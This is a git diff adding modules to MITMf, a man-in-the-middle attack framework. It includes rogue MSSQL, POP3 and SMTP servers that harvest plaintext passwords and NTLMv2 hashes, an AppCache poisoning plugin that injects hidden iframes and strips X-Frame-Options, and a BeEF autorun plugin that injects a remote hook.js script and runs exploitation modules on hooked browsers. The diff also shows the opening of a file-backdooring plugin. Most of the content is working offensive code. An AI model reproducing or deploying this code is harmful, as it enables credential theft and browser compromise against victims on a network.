mitmf_logger.info('[MSSQLServer] MSSQL NTLMv2 User is: {}'.format(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
||||||
|
mitmf_logger.info('[MSSQLServer] MSSQL NTLMv2 Complete Hash is: {}'.format(Writehash))
|
||||||
|
|
||||||
|
def ParseSqlClearTxtPwd(Pwd):
|
||||||
|
Pwd = map(ord,Pwd.replace('\xa5',''))
|
||||||
|
Pw = []
|
||||||
|
for x in Pwd:
|
||||||
|
Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
|
||||||
|
return ''.join(Pw)
|
||||||
|
|
||||||
|
def ParseClearTextSQLPass(Data,client):
|
||||||
|
outfile = "./logs/responder/MSSQL-PlainText-Password-"+client+".txt"
|
||||||
|
UsernameOffset = struct.unpack('<h',Data[48:50])[0]
|
||||||
|
PwdOffset = struct.unpack('<h',Data[52:54])[0]
|
||||||
|
AppOffset = struct.unpack('<h',Data[56:58])[0]
|
||||||
|
PwdLen = AppOffset-PwdOffset
|
||||||
|
UsernameLen = PwdOffset-UsernameOffset
|
||||||
|
PwdStr = ParseSqlClearTxtPwd(Data[8+PwdOffset:8+PwdOffset+PwdLen])
|
||||||
|
UserName = Data[8+UsernameOffset:8+UsernameOffset+UsernameLen].decode('utf-16le')
|
||||||
|
WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr)
|
||||||
|
mitmf_logger.info('[MSSQLServer] {} MSSQL Username: {} Password: {}'.format(client, UserName, PwdStr))
|
||||||
|
|
||||||
|
def ParsePreLoginEncValue(Data):
|
||||||
|
PacketLen = struct.unpack('>H',Data[2:4])[0]
|
||||||
|
EncryptionValue = Data[PacketLen-7:PacketLen-6]
|
||||||
|
if re.search("NTLMSSP",Data):
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
return False
|
||||||
|
|
||||||
|
#MS-SQL server class.
|
||||||
|
class MSSQL(BaseRequestHandler):
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
while True:
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
self.request.settimeout(0.1)
|
||||||
|
##Pre-Login Message
|
||||||
|
if data[0] == "\x12":
|
||||||
|
buffer0 = str(MSSQLPreLoginAnswer())
|
||||||
|
self.request.send(buffer0)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
##NegoSSP
|
||||||
|
if data[0] == "\x10":
|
||||||
|
if re.search("NTLMSSP",data):
|
||||||
|
t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
|
||||||
|
t.calculate()
|
||||||
|
buffer1 = str(t)
|
||||||
|
self.request.send(buffer1)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
else:
|
||||||
|
ParseClearTextSQLPass(data,self.client_address[0])
|
||||||
|
##NegoSSP Auth
|
||||||
|
if data[0] == "\x11":
|
||||||
|
ParseSQLHash(data,self.client_address[0])
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
|
self.request.close()
|
63
core/responder/pop3/POP3Server.py
Normal file
63
core/responder/pop3/POP3Server.py
Normal file
|
@ -0,0 +1,63 @@
|
||||||
|
import logging
|
||||||
|
import threading
|
||||||
|
|
||||||
|
from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
|
from core.responder.common import *
|
||||||
|
from core.responder.odict import OrderedDict
|
||||||
|
from core.responder.packet import Packet
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class POP3Server():
|
||||||
|
|
||||||
|
def start(self):
|
||||||
|
try:
|
||||||
|
mitmf_logger.debug("[POP3Server] online")
|
||||||
|
server = ThreadingTCPServer(("0.0.0.0", 110), POP)
|
||||||
|
t = threading.Thread(name="POP3Server", target=server.serve_forever)
|
||||||
|
t.setDaemon(True)
|
||||||
|
t.start()
|
||||||
|
except Exception, e:
|
||||||
|
mitmf_logger.error("[POP3Server] Error starting on port {}: {}".format(110, e))
|
||||||
|
|
||||||
|
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
||||||
|
|
||||||
|
allow_reuse_address = 1
|
||||||
|
|
||||||
|
def server_bind(self):
|
||||||
|
TCPServer.server_bind(self)
|
||||||
|
|
||||||
|
|
||||||
|
class POPOKPacket(Packet):
|
||||||
|
fields = OrderedDict([
|
||||||
|
("Code", "+OK"),
|
||||||
|
("CRLF", "\r\n"),
|
||||||
|
])
|
||||||
|
|
||||||
|
#POP3 server class.
|
||||||
|
class POP(BaseRequestHandler):
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
self.request.send(str(POPOKPacket()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
if data[0:4] == "USER":
|
||||||
|
User = data[5:].replace("\r\n","")
|
||||||
|
mitmf_logger.info('[+]POP3 User: %s'%(User))
|
||||||
|
t = POPOKPacket()
|
||||||
|
self.request.send(str(t))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
if data[0:4] == "PASS":
|
||||||
|
Pass = data[5:].replace("\r\n","")
|
||||||
|
Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt"
|
||||||
|
WriteData(Outfile,User+":"+Pass, User+":"+Pass)
|
||||||
|
mitmf_logger.info("[POP3Server] POP3 Credentials from {}. User/Pass: {}:{} ".format(self.client_address[0],User,Pass))
|
||||||
|
t = POPOKPacket()
|
||||||
|
self.request.send(str(t))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
else :
|
||||||
|
t = POPOKPacket()
|
||||||
|
self.request.send(str(t))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
except Exception as e:
|
||||||
|
mitmf_logger.error("[POP3Server] Error handling request: {}".format(e))
|
|
@ -16,21 +16,8 @@
|
||||||
# You should have received a copy of the GNU General Public License
|
# You should have received a copy of the GNU General Public License
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
import struct
|
import struct
|
||||||
from odict import OrderedDict
|
from core.responder.odict import OrderedDict
|
||||||
|
from core.responder.packet import Packet
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
#SMTP Greating class
|
#SMTP Greating class
|
||||||
class SMTPGreating(Packet):
|
class SMTPGreating(Packet):
|
62
core/responder/smtp/SMTPServer.py
Normal file
62
core/responder/smtp/SMTPServer.py
Normal file
|
@ -0,0 +1,62 @@
|
||||||
|
import logging
|
||||||
|
import threading
|
||||||
|
|
||||||
|
from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
|
from base64 import b64decode
|
||||||
|
from SMTPPackets import *
|
||||||
|
from core.responder.common import *
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class SMTPServer():
|
||||||
|
|
||||||
|
def serve_thread_tcp(self, port):
|
||||||
|
try:
|
||||||
|
server = ThreadingTCPServer(("0.0.0.0", port), ESMTP)
|
||||||
|
server.serve_forever()
|
||||||
|
except Exception as e:
|
||||||
|
mitmf_logger.error("[SMTPServer] Error starting TCP server on port {}: {}".format(port, e))
|
||||||
|
|
||||||
|
#Function name self-explanatory
|
||||||
|
def start(self):
|
||||||
|
mitmf_logger.debug("[SMTPServer] online")
|
||||||
|
t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=(25,))
|
||||||
|
t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=(587,))
|
||||||
|
|
||||||
|
for t in [t1, t2]:
|
||||||
|
t.setDaemon(True)
|
||||||
|
t.start()
|
||||||
|
|
||||||
|
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
||||||
|
|
||||||
|
allow_reuse_address = 1
|
||||||
|
|
||||||
|
def server_bind(self):
|
||||||
|
TCPServer.server_bind(self)
|
||||||
|
|
||||||
|
#ESMTP server class.
|
||||||
|
class ESMTP(BaseRequestHandler):
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
self.request.send(str(SMTPGreating()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
if data[0:4] == "EHLO":
|
||||||
|
self.request.send(str(SMTPAUTH()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
if data[0:4] == "AUTH":
|
||||||
|
self.request.send(str(SMTPAUTH1()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
if data:
|
||||||
|
Username = b64decode(data[:len(data)-2])
|
||||||
|
self.request.send(str(SMTPAUTH2()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
if data:
|
||||||
|
Password = b64decode(data[:len(data)-2])
|
||||||
|
Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt"
|
||||||
|
WriteData(Outfile,Username+":"+Password, Username+":"+Password)
|
||||||
|
#print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)
|
||||||
|
mitmf_logger.info("[SMTPServer] {} SMTP User: {} Pass:{} ".format(self.client_address[0],Username,Password))
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
mitmf_logger.error("[SMTPServer] Error handling request: {}".format(e))
|
|
@ -103,7 +103,7 @@ class ProxyPlugins:
|
||||||
except KeyError as e:
|
except KeyError as e:
|
||||||
pass
|
pass
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
#This is needed because errors in hooked functions won't raise an Exception + Tracback (which can be infuriating)
|
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
|
||||||
mitmf_logger.error("[ProxyPlugins] Exception occurred in hooked function")
|
mitmf_logger.error("[ProxyPlugins] Exception occurred in hooked function")
|
||||||
traceback.print_exc()
|
traceback.print_exc()
|
||||||
|
|
||||||
|
|
|
@ -98,7 +98,7 @@ class ServerConnection(HTTPClient):
|
||||||
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
|
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
|
||||||
if len(postdata) > 0:
|
if len(postdata) > 0:
|
||||||
mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata))
|
mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata))
|
||||||
except UnicodeDecodeError:
|
except UnicodeDecodeError and UnicodeEncodeError:
|
||||||
mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
|
mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
Subproject commit 4609adeb5383135352aa27113d8ee1398aecff99
|
Subproject commit 0bd3429e6775395c3522046ab21193a36ab2e0fe
|
9
mitmf.py
9
mitmf.py
|
@ -39,8 +39,6 @@ if os.geteuid() != 0:
|
||||||
mitmf_version = "0.9.7"
|
mitmf_version = "0.9.7"
|
||||||
sslstrip_version = "0.9"
|
sslstrip_version = "0.9"
|
||||||
sergio_version = "0.2.1"
|
sergio_version = "0.2.1"
|
||||||
dnschef_version = "0.4"
|
|
||||||
netcreds_version = "1.0"
|
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
|
parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
|
||||||
|
|
||||||
|
@ -162,17 +160,16 @@ print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version)
|
||||||
#Start Net-Creds
|
#Start Net-Creds
|
||||||
from core.netcreds.NetCreds import NetCreds
|
from core.netcreds.NetCreds import NetCreds
|
||||||
NetCreds().start(args.interface, myip)
|
NetCreds().start(args.interface, myip)
|
||||||
print "|_ Net-Creds v{} online".format(netcreds_version)
|
print "|_ Net-Creds v{} online".format(NetCreds.version)
|
||||||
|
|
||||||
#Start DNSChef
|
#Start DNSChef
|
||||||
from core.dnschef.DNSchef import DNSChef
|
from core.dnschef.DNSchef import DNSChef
|
||||||
DNSChef.getInstance().start()
|
DNSChef.getInstance().start()
|
||||||
print "|_ DNSChef v{} online".format(dnschef_version)
|
print "|_ DNSChef v{} online".format(DNSChef.version)
|
||||||
|
|
||||||
#start the SMB server
|
#start the SMB server
|
||||||
from core.protocols.smb.SMBserver import SMBserver
|
from core.protocols.smb.SMBserver import SMBserver
|
||||||
from impacket import version
|
print "|_ SMBserver online (Impacket {})\n".format(SMBserver.impacket_ver)
|
||||||
print "|_ SMBserver online (Impacket {})\n".format(version.VER_MINOR)
|
|
||||||
SMBserver().start()
|
SMBserver().start()
|
||||||
|
|
||||||
#start the reactor
|
#start the reactor
|
||||||
|
|
206
plugins/AppCachePoison.py
Normal file
206
plugins/AppCachePoison.py
Normal file
|
@ -0,0 +1,206 @@
|
||||||
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
|
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
||||||
|
|
||||||
|
import logging
|
||||||
|
import re
|
||||||
|
import os.path
|
||||||
|
import time
|
||||||
|
import sys
|
||||||
|
|
||||||
|
from datetime import date
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from core.sslstrip.URLMonitor import URLMonitor
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class AppCachePlugin(Plugin):
|
||||||
|
name = "App Cache Poison"
|
||||||
|
optname = "appoison"
|
||||||
|
desc = "Performs App Cache Poisoning attacks"
|
||||||
|
implements = ["handleResponse"]
|
||||||
|
version = "0.3"
|
||||||
|
has_opts = False
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
self.options = options
|
||||||
|
self.mass_poisoned_browsers = []
|
||||||
|
self.urlMonitor = URLMonitor.getInstance()
|
||||||
|
|
||||||
|
self.urlMonitor.setAppCachePoisoning()
|
||||||
|
|
||||||
|
def handleResponse(self, request, data):
|
||||||
|
|
||||||
|
self.app_config = self.config['AppCachePoison'] # so we reload the config on each request
|
||||||
|
url = request.client.uri
|
||||||
|
req_headers = request.client.getAllHeaders()
|
||||||
|
headers = request.client.responseHeaders
|
||||||
|
ip = request.client.getClientIP()
|
||||||
|
|
||||||
|
#########################################################################
|
||||||
|
|
||||||
|
if "enable_only_in_useragents" in self.app_config:
|
||||||
|
regexp = self.app_config["enable_only_in_useragents"]
|
||||||
|
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
||||||
|
mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
|
||||||
|
return {'request': request, 'data': data}
|
||||||
|
|
||||||
|
urls = self.urlMonitor.getRedirectionSet(url)
|
||||||
|
mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
|
||||||
|
(name,s,element,url) = self.getSectionForUrls(urls)
|
||||||
|
|
||||||
|
if s is False:
|
||||||
|
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
||||||
|
return {'request': request, 'data': data}
|
||||||
|
|
||||||
|
mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name))
|
||||||
|
p = self.getTemplatePrefix(s)
|
||||||
|
|
||||||
|
if element == 'tamper':
|
||||||
|
mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p))
|
||||||
|
if os.path.exists(p + '.replace'): # replace whole content
|
||||||
|
f = open(p + '.replace','r')
|
||||||
|
data = self.decorate(f.read(), s)
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
elif os.path.exists(p + '.append'): # append file to body
|
||||||
|
f = open(p + '.append','r')
|
||||||
|
appendix = self.decorate(f.read(), s)
|
||||||
|
f.close()
|
||||||
|
# append to body
|
||||||
|
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
||||||
|
|
||||||
|
# add manifest reference
|
||||||
|
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
|
||||||
|
|
||||||
|
elif element == "manifest":
|
||||||
|
mitmf_logger.info("%s Poisoning manifest URL" % ip)
|
||||||
|
data = self.getSpoofedManifest(url, s)
|
||||||
|
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
||||||
|
|
||||||
|
elif element == "raw": # raw resource to modify, it does not have to be html
|
||||||
|
mitmf_logger.info("%s Poisoning raw URL" % ip)
|
||||||
|
if os.path.exists(p + '.replace'): # replace whole content
|
||||||
|
f = open(p + '.replace','r')
|
||||||
|
data = self.decorate(f.read(), s)
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
elif os.path.exists(p + '.append'): # append file to body
|
||||||
|
f = open(p + '.append','r')
|
||||||
|
appendix = self.decorate(f.read(), s)
|
||||||
|
f.close()
|
||||||
|
# append to response body
|
||||||
|
data += appendix
|
||||||
|
|
||||||
|
self.cacheForFuture(headers)
|
||||||
|
self.removeDangerousHeaders(headers)
|
||||||
|
return {'request': request, 'data': data}
|
||||||
|
|
||||||
|
def tryMassPoison(self, url, data, headers, req_headers, ip):
|
||||||
|
browser_id = ip + req_headers.get("user-agent", "")
|
||||||
|
|
||||||
|
if not 'mass_poison_url_match' in self.app_config: # no url
|
||||||
|
return data
|
||||||
|
if browser_id in self.mass_poisoned_browsers: #already poisoned
|
||||||
|
return data
|
||||||
|
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
|
||||||
|
return data
|
||||||
|
if 'mass_poison_useragent_match' in self.app_config and not "user-agent" in req_headers:
|
||||||
|
return data
|
||||||
|
if not re.search(self.app_config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
|
||||||
|
return data
|
||||||
|
if not re.search(self.app_config['mass_poison_url_match'], url): #different url
|
||||||
|
return data
|
||||||
|
|
||||||
|
mitmf_logger.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
|
||||||
|
appendix = self.getMassPoisonHtml()
|
||||||
|
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
||||||
|
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
|
||||||
|
return data
|
||||||
|
|
||||||
|
def getMassPoisonHtml(self):
|
||||||
|
html = "<div style=\"position:absolute;left:-100px\">"
|
||||||
|
for i in self.app_config:
|
||||||
|
if isinstance(self.app_config[i], dict):
|
||||||
|
if self.app_config[i].has_key('tamper_url') and not self.app_config[i].get('skip_in_mass_poison', False):
|
||||||
|
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.app_config[i]['tamper_url'] + "\"></iframe>"
|
||||||
|
|
||||||
|
return html + "</div>"
|
||||||
|
|
||||||
|
def cacheForFuture(self, headers):
|
||||||
|
ten_years = 315569260
|
||||||
|
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
|
||||||
|
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
|
||||||
|
in_ten_years = date.fromtimestamp(time.time() + ten_years)
|
||||||
|
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
|
||||||
|
|
||||||
|
def removeDangerousHeaders(self, headers):
|
||||||
|
headers.removeHeader("X-Frame-Options")
|
||||||
|
|
||||||
|
def getSpoofedManifest(self, url, section):
|
||||||
|
p = self.getTemplatePrefix(section)
|
||||||
|
if not os.path.exists(p+'.manifest'):
|
||||||
|
p = self.getDefaultTemplatePrefix()
|
||||||
|
|
||||||
|
f = open(p + '.manifest', 'r')
|
||||||
|
manifest = f.read()
|
||||||
|
f.close()
|
||||||
|
return self.decorate(manifest, section)
|
||||||
|
|
||||||
|
def decorate(self, content, section):
|
||||||
|
for i in section:
|
||||||
|
content = content.replace("%%"+i+"%%", section[i])
|
||||||
|
return content
|
||||||
|
|
||||||
|
def getTemplatePrefix(self, section):
|
||||||
|
if section.has_key('templates'):
|
||||||
|
return self.app_config['templates_path'] + '/' + section['templates']
|
||||||
|
|
||||||
|
return self.getDefaultTemplatePrefix()
|
||||||
|
|
||||||
|
def getDefaultTemplatePrefix(self):
|
||||||
|
return self.app_config['templates_path'] + '/default'
|
||||||
|
|
||||||
|
def getManifestUrl(self, section):
|
||||||
|
return section.get("manifest_url",'/robots.txt')
|
||||||
|
|
||||||
|
def getSectionForUrls(self, urls):
|
||||||
|
for url in urls:
|
||||||
|
for i in self.app_config:
|
||||||
|
if isinstance(self.app_config[i], dict): #section
|
||||||
|
section = self.app_config[i]
|
||||||
|
name = i
|
||||||
|
|
||||||
|
if section.get('tamper_url',False) == url:
|
||||||
|
return (name, section, 'tamper',url)
|
||||||
|
|
||||||
|
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
||||||
|
return (name, section, 'tamper',url)
|
||||||
|
|
||||||
|
if section.get('manifest_url',False) == url:
|
||||||
|
return (name, section, 'manifest',url)
|
||||||
|
|
||||||
|
if section.get('raw_url',False) == url:
|
||||||
|
return (name, section, 'raw',url)
|
||||||
|
|
||||||
|
return (None, False,'',urls.copy().pop())
|
||||||
|
|
||||||
|
|
127
plugins/BeefAutorun.py
Normal file
127
plugins/BeefAutorun.py
Normal file
|
@ -0,0 +1,127 @@
|
||||||
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
|
import logging
|
||||||
|
import sys
|
||||||
|
import json
|
||||||
|
|
||||||
|
from time import sleep
|
||||||
|
from core.beefapi import BeefAPI
|
||||||
|
from core.utils import SystemConfig
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from plugins.Inject import Inject
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class BeefAutorun(Inject, Plugin):
|
||||||
|
name = "BeEFAutorun"
|
||||||
|
optname = "beefauto"
|
||||||
|
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
||||||
|
tree_output = []
|
||||||
|
depends = ["Inject"]
|
||||||
|
version = "0.3"
|
||||||
|
has_opts = False
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
self.options = options
|
||||||
|
self.ip_address = SystemConfig.getIP(options.interface)
|
||||||
|
|
||||||
|
Inject.initialize(self, options)
|
||||||
|
|
||||||
|
self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
|
||||||
|
self.onConfigChange()
|
||||||
|
|
||||||
|
def onConfigChange(self):
|
||||||
|
|
||||||
|
beefconfig = self.config['MITMf']['BeEF']
|
||||||
|
|
||||||
|
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
|
||||||
|
|
||||||
|
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
|
||||||
|
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
|
||||||
|
sys.exit("[-] Error logging in to BeEF!")
|
||||||
|
|
||||||
|
def startThread(self, options):
|
||||||
|
self.autorun()
|
||||||
|
|
||||||
|
def autorun(self):
|
||||||
|
already_ran = []
|
||||||
|
already_hooked = []
|
||||||
|
|
||||||
|
while True:
|
||||||
|
mode = self.config['BeEFAutorun']['mode']
|
||||||
|
sessions = self.beef.sessions_online()
|
||||||
|
if (sessions is not None and len(sessions) > 0):
|
||||||
|
for session in sessions:
|
||||||
|
|
||||||
|
if session not in already_hooked:
|
||||||
|
info = self.beef.hook_info(session)
|
||||||
|
mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os']))
|
||||||
|
already_hooked.append(session)
|
||||||
|
self.black_ips.append(str(info['ip']))
|
||||||
|
|
||||||
|
if mode == 'oneshot':
|
||||||
|
if session not in already_ran:
|
||||||
|
self.execModules(session)
|
||||||
|
already_ran.append(session)
|
||||||
|
|
||||||
|
elif mode == 'loop':
|
||||||
|
self.execModules(session)
|
||||||
|
sleep(10)
|
||||||
|
|
||||||
|
else:
|
||||||
|
sleep(1)
|
||||||
|
|
||||||
|
def execModules(self, session):
|
||||||
|
session_info = self.beef.hook_info(session)
|
||||||
|
session_ip = session_info['ip']
|
||||||
|
hook_browser = session_info['name']
|
||||||
|
hook_os = session_info['os']
|
||||||
|
all_modules = self.config['BeEFAutorun']["ALL"]
|
||||||
|
targeted_modules = self.config['BeEFAutorun']["targets"]
|
||||||
|
|
||||||
|
if len(all_modules) > 0:
|
||||||
|
mitmf_logger.info("{} >> sending generic modules".format(session_ip))
|
||||||
|
for module, options in all_modules.iteritems():
|
||||||
|
mod_id = self.beef.module_id(module)
|
||||||
|
resp = self.beef.module_run(session, mod_id, json.loads(options))
|
||||||
|
if resp["success"] == 'true':
|
||||||
|
mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
|
||||||
|
else:
|
||||||
|
mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
|
||||||
|
sleep(0.5)
|
||||||
|
|
||||||
|
mitmf_logger.info("{} >> sending targeted modules".format(session_ip))
|
||||||
|
for os in targeted_modules:
|
||||||
|
if (os in hook_os) or (os == hook_os):
|
||||||
|
browsers = targeted_modules[os]
|
||||||
|
if len(browsers) > 0:
|
||||||
|
for browser in browsers:
|
||||||
|
if browser == hook_browser:
|
||||||
|
modules = targeted_modules[os][browser]
|
||||||
|
if len(modules) > 0:
|
||||||
|
for module, options in modules.iteritems():
|
||||||
|
mod_id = self.beef.module_id(module)
|
||||||
|
resp = self.beef.module_run(session, mod_id, json.loads(options))
|
||||||
|
if resp["success"] == 'true':
|
||||||
|
mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
|
||||||
|
else:
|
||||||
|
mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
|
||||||
|
sleep(0.5)
|
129
plugins/BrowserProfiler.py
Normal file
129
plugins/BrowserProfiler.py
Normal file
File diff suppressed because one or more lines are too long
650
plugins/FilePwn.py
Normal file
650
plugins/FilePwn.py
Normal file
|
@ -0,0 +1,650 @@
|
||||||
|
#!/usr/bin/env python2.7
|
||||||
|
|
||||||
|
# Copyright (c) 2014-2016 Marcello Salvati
|
||||||
|
#
|
||||||
|
# This program is free software; you can redistribute it and/or
|
||||||
|
# modify it under the terms of the GNU General Public License as
|
||||||
|
# published by the Free Software Foundation; either version 3 of the
|
||||||
|
# License, or (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful, but
|
||||||
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||||
|
# General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program; if not, write to the Free Software
|
||||||
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
|
# USA
|
||||||
|
#
|
||||||
|
|
||||||
|
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||||
|
#
|
||||||
|
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||||
|
#
|
||||||
|
# Copyright (c) 2013-2014, Joshua Pitts
|
||||||
